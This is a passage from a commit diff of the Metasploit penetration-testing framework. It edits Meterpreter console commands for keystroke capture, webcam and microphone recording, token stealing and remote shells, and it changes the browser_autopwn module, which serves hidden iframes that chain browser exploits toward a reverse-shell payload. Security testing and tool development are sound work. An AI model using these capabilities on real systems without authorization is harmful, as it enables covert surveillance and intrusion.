"getprivs" => [ "stdapi_sys_config_getprivs" ],
"getuid" => [ "stdapi_sys_config_getuid" ],
"kill" => [ "stdapi_sys_process_kill" ],
"ps" => [ "stdapi_sys_process_get_processes" ],
"reboot" => [ "stdapi_sys_power_exitwindows" ],
"reg" => [
"stdapi_registry_load_key",
"stdapi_registry_unload_key",
"stdapi_registry_open_key",
"stdapi_registry_open_remote_key",
"stdapi_registry_create_key",
"stdapi_registry_delete_key",
"stdapi_registry_close_key",
"stdapi_registry_enum_key",
"stdapi_registry_set_value",
"stdapi_registry_query_value",
"stdapi_registry_delete_value",
"stdapi_registry_query_class",
"stdapi_registry_enum_value",
],
"rev2self" => [ "stdapi_sys_config_rev2self" ],
"shell" => [ "stdapi_sys_process_execute" ],
"shutdown" => [ "stdapi_sys_power_exitwindows" ],
"steal_token" => [ "stdapi_sys_config_steal_token" ],
"sysinfo" => [ "stdapi_sys_config_sysinfo" ],
}
all.delete_if do |cmd, desc|
del = false
reqs[cmd].each do |req|
next if client.commands.include? req
del = true
break
end
del
end
all
end
#

40
lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/ui.rb
View File

@ -20,20 +20,50 @@ class Console::CommandDispatcher::Stdapi::Ui
# List of supported commands.
#
def commands
{
"idletime" => "Returns the number of seconds the remote user has been idle",
"uictl" => "Control some of the user interface components",
all = {
"enumdesktops" => "List all accessible desktops and window stations",
"getdesktop" => "Get the current meterpreter desktop",
"setdesktop" => "Change the meterpreters current desktop",
"idletime" => "Returns the number of seconds the remote user has been idle",
"keyscan_dump" => "Dump the keystroke buffer",
"keyscan_start" => "Start capturing keystrokes",
"keyscan_stop" => "Stop capturing keystrokes",
"keyscan_dump" => "Dump the keystroke buffer",
"screenshot" => "Grab a screenshot of the interactive desktop",
"setdesktop" => "Change the meterpreters current desktop",
"uictl" => "Control some of the user interface components",
# not working yet
# "unlockdesktop" => "Unlock or lock the workstation (must be inside winlogon.exe)",
}
reqs = {
"enumdesktops" => [ "stdapi_ui_desktop_enum" ],
"getdesktop" => [ "stdapi_ui_desktop_get" ],
"idletime" => [ "stdapi_ui_get_idle_time" ],
"keyscan_dump" => [ "stdapi_ui_get_keys" ],
"keyscan_start" => [ "stdapi_ui_start_keyscan" ],
"keyscan_stop" => [ "stdapi_ui_stop_keyscan" ],
"screenshot" => [ "stdapi_ui_desktop_screenshot" ],
"setdesktop" => [ "stdapi_ui_desktop_set" ],
"uictl" => [
"stdapi_ui_enable_mouse",
"stdapi_ui_disable_mouse",
"stdapi_ui_enable_keyboard",
"stdapi_ui_disable_keyboard",
],
}
all.delete_if do |cmd, desc|
del = false
reqs[cmd].each do |req|
next if client.commands.include? req
del = true
break
end
del
end
all
end
#

20
lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/webcam.rb
View File

@ -20,11 +20,29 @@ class Console::CommandDispatcher::Stdapi::Webcam
# List of supported commands.
#
def commands
{
all = {
"webcam_list" => "List webcams",
"webcam_snap" => "Take a snapshot from the specified webcam",
"record_mic" => "Record audio from the default microphone for X seconds"
}
reqs = {
"webcam_list" => [ "webcam_list" ],
"webcam_snap" => [ "webcam_start", "webcam_get_frame", "webcam_stop" ],
"record_mic" => [ "webcam_record_audio" ],
}
all.delete_if do |cmd, desc|
del = false
reqs[cmd].each do |req|
next if client.commands.include? req
del = true
break
end
del
end
all
end
#

9
lib/rex/text.rb
View File

@ -239,6 +239,15 @@ module Text
return buff
end
def self.to_octal(str, prefix = "\\")
octal = ""
str.each_byte { |b|
octal << "#{prefix}#{b.to_s 8}"
}
return octal
end
#
# Returns the hex version of the supplied string
#

20
modules/auxiliary/server/browser_autopwn.rb
View File

@ -60,6 +60,11 @@ class Metasploit3 < Msf::Auxiliary
],
'PassiveActions' =>
[ 'WebServer', 'DefangedDetection' ],
'DefaultOptions' => {
# We know that most of these exploits will crash the browser, so
# set the default to run migrate right away if possible.
"InitialAutoRunScript" => "migrate -f",
},
'DefaultAction' => 'WebServer'))
register_options([
@ -69,9 +74,6 @@ class Metasploit3 < Msf::Auxiliary
], self.class)
register_advanced_options([
# We know that most of these exploits will crash the browser, so
# set the default to run migrate right away if possible.
OptString.new('InitialAutoRunScript', [false, "An initial script to run on session created (before AutoRunScript)", 'migrate -f']),
OptString.new('AutoRunScript', [false, "A script to automatically on session creation.", '']),
OptBool.new('AutoSystemInfo', [true, "Automatically capture system information on initialization.", true]),
OptString.new('MATCH', [false,
@ -109,7 +111,7 @@ class Metasploit3 < Msf::Auxiliary
'The port to use for generic reverse-connect payloads', 6666
]),
OptString.new('PAYLOAD_GENERIC', [false,
'The payload to use for generic reverse-connect payloads6',
'The payload to use for generic reverse-connect payloads',
'generic/shell_reverse_tcp'
]),
OptPort.new('LPORT_JAVA', [false,
@ -703,14 +705,14 @@ class Metasploit3 < Msf::Auxiliary
str = '';
str += '<iframe src="' + myframe + '" style="visibility:hidden" height="0" width="0" border="0"></iframe>';
document.body.innerHTML += (str);
}
window.next_exploit = function (exploit_idx) {
};
window.next_exploit = function(exploit_idx) {
#{js_debug("'next_exploit(' + exploit_idx +')<br>'")}
if (!global_exploit_list[exploit_idx]) {
#{js_debug("'End<br>'")}
return;
}
#{js_debug("'trying ' + global_exploit_list[exploit_idx].resource + '<br>'")}
#{js_debug("'trying ' + global_exploit_list[exploit_idx].resource + ' of ' + global_exploit_list.length + '<br>'")}
// Wrap all of the vuln tests in a try-catch block so a
// single borked test doesn't prevent other exploits
// from working.
@ -739,7 +741,7 @@ class Metasploit3 < Msf::Auxiliary
#{js_debug("'test threw an exception: ' + e.message + '<br />'")}
window.next_exploit(exploit_idx+1);
};
}
};
ENDJS
sploits_for_this_client = []
@ -828,7 +830,7 @@ class Metasploit3 < Msf::Auxiliary
js << "window.next_exploit(0);\n"
js = ::Rex::Exploitation::JSObfu.new(js)
js.obfuscate
js.obfuscate unless datastore["DEBUG"]
response.body = "#{js}"

3
modules/exploits/multi/browser/java_rhino.rb
View File

@ -13,6 +13,9 @@ class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::Remote::BrowserAutopwn
autopwn_info({ :javascript => false })
def initialize( info = {} )
super( update_info( info,
'Name' => 'Java Applet Rhino Script Engine Remote Code Execution',

15
modules/post/osx/gather/enum_adium.rb
View File

@ -224,21 +224,14 @@ class Metasploit3 < Msf::Post
# and retry under certain conditions.
#
def exec(cmd)
tries = 0
begin
out = cmd_exec(cmd).chomp
rescue ::Timeout::Error => e
tries += 1
if tries < 3
vprint_error("#{@peer} - #{e.message} - retrying...")
retry
end
vprint_error("#{@peer} - #{e.message} - retrying...")
retry
rescue EOFError => e
tries += 1
if tries < 3
vprint_error("#{@peer} - #{e.message} - retrying...")
retry
end
vprint_error("#{@peer} - #{e.message} - retrying...")
retry
end
end

2
test/modules/post/test/file.rb
View File

@ -1,5 +1,5 @@
require 'module_test'
require 'test/lib/module_test'
#load 'test/lib/module_test.rb'
#load 'lib/rex/text.rb'

25
test/modules/post/test/meterpreter.rb
View File

@ -3,8 +3,7 @@ require 'msf/core'
require 'rex'
$:.push "test/lib" unless $:.include? "test/lib"
#require 'module_test'
load 'test/lib/module_test.rb'
require 'module_test'
class Metasploit4 < Msf::Post
@ -38,6 +37,11 @@ class Metasploit4 < Msf::Post
end
def test_net_config
unless (session.commands.include? "stdapi_net_config_get_interfaces")
vprint_status("This meterpreter does not implement get_interfaces, skipping tests")
return
end
vprint_status("Starting networking tests")
it "should return network interfaces" do
@ -160,16 +164,19 @@ class Metasploit4 < Msf::Post
vprint_status("uploading")
session.fs.file.upload_file(remote, local)
vprint_status("done")
res &&= session.fs.dir.entries.include?(remote)
res &&= session.fs.file.exists?(remote)
vprint_status("remote file exists? #{res.inspect}")
if res
session.fs.file.download(remote, remote)
res &&= ::File.file? remote
downloaded_contents = ::File.read(remote)
fd = session.fs.file.new(remote, "rb")
uploaded_contents = fd.read
until (fd.eof?)
uploaded_contents << fd.read
end
fd.close
original_contents = ::File.read(local)
res &&= !!(downloaded_contents == original_contents)
::File.unlink remote
res &&= !!(uploaded_contents == original_contents)
end
session.fs.file.rm(remote)
@ -183,7 +190,7 @@ class Metasploit4 < Msf::Post
vprint_status("uploading")
session.fs.file.upload_file(remote, local)
vprint_status("done")
res &&= session.fs.dir.entries.include?(remote)
res &&= session.fs.file.exists?(remote)
vprint_status("remote file exists? #{res.inspect}")
if res

2
test/modules/post/test/unix.rb
View File

@ -1,5 +1,5 @@
require 'module_test'
require 'test/lib/module_test'
#load 'test/lib/module_test.rb'
#load 'lib/rex/text.rb'